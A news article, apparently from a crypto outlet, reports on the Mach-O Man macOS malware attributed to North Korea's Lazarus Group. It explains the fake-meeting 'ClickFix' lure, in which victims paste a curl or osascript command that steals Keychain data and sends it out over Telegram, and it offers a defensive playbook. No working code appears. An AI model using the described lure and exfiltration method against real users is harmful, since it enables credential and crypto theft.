Lazarus Now Lives on Your MacBook: Mach-O Man, Fake Zoom and the North Korean Playbook Against Crypto Execs

Imagine the scene: you're head of engineering at a Brazilian exchange, you receive an urgent Telegram invite for a Google Meet call with a Singapore fund. The link takes you to a page identical to the official one, with video freezing due to "a macOS audio problem". The page politely asks you to paste a command in Terminal to "fix the driver". You're a crypto exec, you've been using Mac for ten years, you've run a thousand Terminal commands. You paste. Twenty seconds later, your entire Keychain — with exchange passwords, API keys, Vercel session tokens, bank cookies — is in a private Telegram channel controlled by Pyongyang.

This scenario stopped being hypothetical last week. On April 21, 2026, Bitso's Quetzal security team, in partnership with the ANY.RUN analysis platform, published the discovery of a new modular malware kit for macOS nicknamed Mach-O Man — attributed, with high confidence, to the Famous Chollima unit of the Lazarus Group, the crypto operations arm of North Korean intelligence.

The story, in short: the same group that stole $1.5 billion from Bybit in February 2025 has now changed targets. Instead of hunting bridge library developers or multisig wallet operators, Lazarus is going after executives. And the preferred vector is the corporate laptop everyone swore was secure: the MacBook.

What is Mach-O Man, technically

The name is a reference to macOS's native executable format (Mach-O) and wrestler Randy Savage. Behind the joke is one of the cleanest kits Lazarus has ever deployed on Mac. Three characteristics define Mach-O Man:

• Modular. It's not a single binary. It's stages — dropper, infostealer, C2 beacon, self-destruct — that can be combined depending on the target.
• No heavy persistence. Unlike classic malware that plants LaunchDaemons to survive reboots, Mach-O Man executes, exfiltrates and can self-destruct in minutes. It was designed for surgical attacks, not long-term control.
• Exfiltration via Telegram. The collected data — browser credentials, session cookies, Keychain entries, terminal history, local crypto wallet files — are compressed and sent to private Telegram channels controlled by operators. No proprietary C2 server means less forensic footprint and more difficulty for takedown.

The kit also includes a self-destruction script that uses native system commands to remove the malware and cover its tracks, bypassing user confirmation dialogs. When the victim notices something is wrong, the binary is already gone.

The attack in practice: ClickFix, the perfect social engineering

The technical hook is secondary. The real attack is psychological, and it's called ClickFix. The sequence is always similar:

1. First contact via Telegram or LinkedIn, personalized. The attacker impersonates a fund head, exchange BD head, M&A recruiter or reporter from a recognized outlet. The message has real context — it picks data from recent posts, events the target actually attended, deals the company announced.
2. Invite for urgent call. "Today, 15 minutes from now, it's time-sensitive." The link looks like Zoom, Teams or Google Meet. It's not. It's an identical replica hosted on a similar-looking domain (typosquat) or hijacked legitimate CDN.
3. Staged bug in the call. The page simulates an audio or camera problem. A modal appears saying: "we detected a problem with your audio on macOS. Paste the command below in Terminal to fix it."
4. The command. Usually a one-liner that invokes curl or osascript to download and execute the Mach-O Man dropper. In some observed cases, the command is obfuscated via base64 to escape technical user perception.
5. Silent exfiltration. The binary runs with user privileges (doesn't need sudo), accesses the Keychain, copies sensitive data and sends it to Telegram. In corporate environments without specific macOS EDR, the alert is zero.

The name "ClickFix" has been seen in campaigns against traditional finance since 2024, but this is the first time a tier 1 APT actor has operationalized the technique at scale against crypto.

Lazarus in 2026: a trail of $2 billion

Mach-O Man doesn't emerge in a vacuum. It's the natural evolution of a sequence of operations that, over the last eighteen months, made North Korea the world's largest state actor in crypto theft. The known numbers:

• February 2025 — Bybit: $1.5 billion drained via malicious JavaScript injection into the Safe{Wallet} interface, after a dev had his machine compromised. The largest crypto heist in history.
• April 2026 — Drift Protocol: $285 million siphoned in a social engineering operation that took six months of infiltration. Attributed to the UNC4736 subunit — our coverage in Drift Confirms: $285M Hack Was 6-Month North Korean Intelligence Operation.
• April 2026 — KelpDAO: $293 million in exploit, of which Arbitrum froze $71 million by security council action — see Arbitrum Freezes $71 Million From Kelp Hacker.

Consulting firm CertiK attributed both Drift and Kelp to Famous Chollima — the same unit now operating Mach-O Man. The pattern is clear: in 2024, Lazarus attacked cross-chain bridges; in 2025, it migrated to infrastructure supply chain (Bybit via Safe{Wallet}); in 2026, it's hunting people. It's not tactical regression. It's sophistication.

For the complete picture of the month, it's worth reviewing our consolidated coverage in DeFi's Black April: $606 Million in Hacks in Just 18 Days.

Why the focus is macOS now

For years, the "Mac is secure" narrative was a combo of three things: lower market share (less incentive for attackers), Unix-like architecture with sandboxing, and Gatekeeper + notarization blocking unsigned binaries. That balance broke.

Three factors pushed Lazarus toward macOS:

• Concentration of targets. Crypto execs and engineers use Mac at a much higher proportion than the overall market average. A single CTO MacBook at an exchange is worth more, in terms of damage potential, than a hundred random corporate PCs.
• Less mature defenses. Corporate EDRs (Crowdstrike, SentinelOne) have much deeper Windows coverage than macOS. Corporate SIEMs rarely have specific rules for osascript, Keychain modifications or anomalous curl | sh usage.
• ClickFix bypasses Gatekeeper. When the user voluntarily pastes and executes the command in their own Terminal, none of the notarization protections apply. The attack doesn't download a packaged app — it downloads a script.

The timing also aligns with the expansion of Latin America's crypto ecosystem. With Brazilian exchanges tightening regulatory closure with the Central Bank, the volume of assets under local custody grew — and with it, the interest of state actors in compromising who runs those houses.

Defensive playbook for execs and crypto teams

The practical part. If you're a CEO, CTO, security head or senior dev at any crypto operation, these are the actions that make sense to execute this week, not "next quarter":

For the individual exec

1. Golden rule: never paste a command in Terminal from a web page. If the "solution" to your audio problem is running a script, it's malware. Always. No exceptions. macOS audio and video don't fix themselves via shell.
2. Meeting invites coming via Telegram or social network DMs are suspicious by default. Confirm via secondary channel (corporate email, verified WhatsApp) before clicking any link. It takes 30 seconds.
3. Enable FileVault and review your Keychain. Delete old credentials you no longer use. Mach-O Man doesn't differentiate between current and obsolete — it takes everything.
4. Rotate critical passwords and API keys every 90 days. Yes, it's annoying. But it reduces the blast radius of any compromise to a quarter.
5. Use a password manager other than Keychain for the most sensitive secrets (1Password, Bitwarden with strong master key). Mach-O Man specifically targets Keychain.

For the company

1. Install EDR with real macOS coverage. Crowdstrike Falcon, SentinelOne Singularity and Jamf Protect have detection for behaviors typical of Mach-O Man — script execution via osascript, anomalous Keychain access, outbound connections to Telegram API.
2. Block Telegram API at the corporate firewall, except on machines that genuinely need it. Exfiltration via Telegram is a signature of Mach-O Man.
3. Train your executive team on ClickFix. Everyone recognizes traditional phishing. ClickFix is new and specifically designed for people with technical background.
4. MFA via hardware key (YubiKey), not SMS or app. Session tokens stolen from Keychain lose value if the next authentication requires physical tap.
5. Segregate work wallets from personal wallets. If the personal MacBook is compromised, the corporate key in a separate hardware wallet survives.

What this means for Brazil

Two things.

First, Brazil is on the radar. Bitso's Quetzal team itself was the first to identify the campaign — which only makes sense if attack traffic passed through LatAm infrastructure or customers. Executives at Brazilian exchanges, digital asset fintechs and funds are explicitly among the targets.

Second, the local ecosystem has its own aggravating factors. As we covered in Trojan GoPix Evolves, malware adapted to the Brazilian context (Pix, bank transfers, national digital banks) is already on the scene. The combination of a Lazarus attack against an exec with a local banking trojan already on the machine is devastating. Crypto money exits via Keychain exfiltration; fiat money exits via fraudulent Pix. On the same day.

And there's a third, less obvious point: the wave of deepfake attacks against biometric KYC in March and April creates perverse synergy with Mach-O Man. If the attacker steals your credentials via Mach-O Man and then passes 2FA biometric verification via deepfake with your photo from the internet, the combo bypasses all defense layers of an average exchange.

The context: targeted phishing rose 1,400% in the first two months of 2026. Mach-O Man is just the most sophisticated tip of a macro trend.

The ON3X perspective

Three takeaways to close.

One: crypto security in 2026 is a human problem, not a technical one. Every high-impact attack this year started with a person — dev, exec, operator. Protocols are more audited than ever. It's the human that remains the weak link, and state actors know this well before we do.

Two: "Mac is secure" died on April 21, 2026. The digital hygiene that Windows execs internalized two decades ago now needs to be replicated in the Apple ecosystem. It's not paranoia, it's realism.

Three: institutional custody matters. Regulated platforms that segregate assets, operate distributed multisig cold storage and have 24/7 on-chain monitoring pipeline don't eliminate risk — they transfer it to whoever has scale to absorb it. Exec who keeps everything in self-custody on their own MacBook became, in 2026, Pyongyang's target of choice.

The question every crypto C-level needs to ask themselves when reading this story is simple: if the next fake Zoom call came to me today, would I paste the command? The honest answer, even for those who think they wouldn't, usually is "it depends on the rush and who sent it". That's exactly why ClickFix works. And that's exactly why Lazarus is making billions.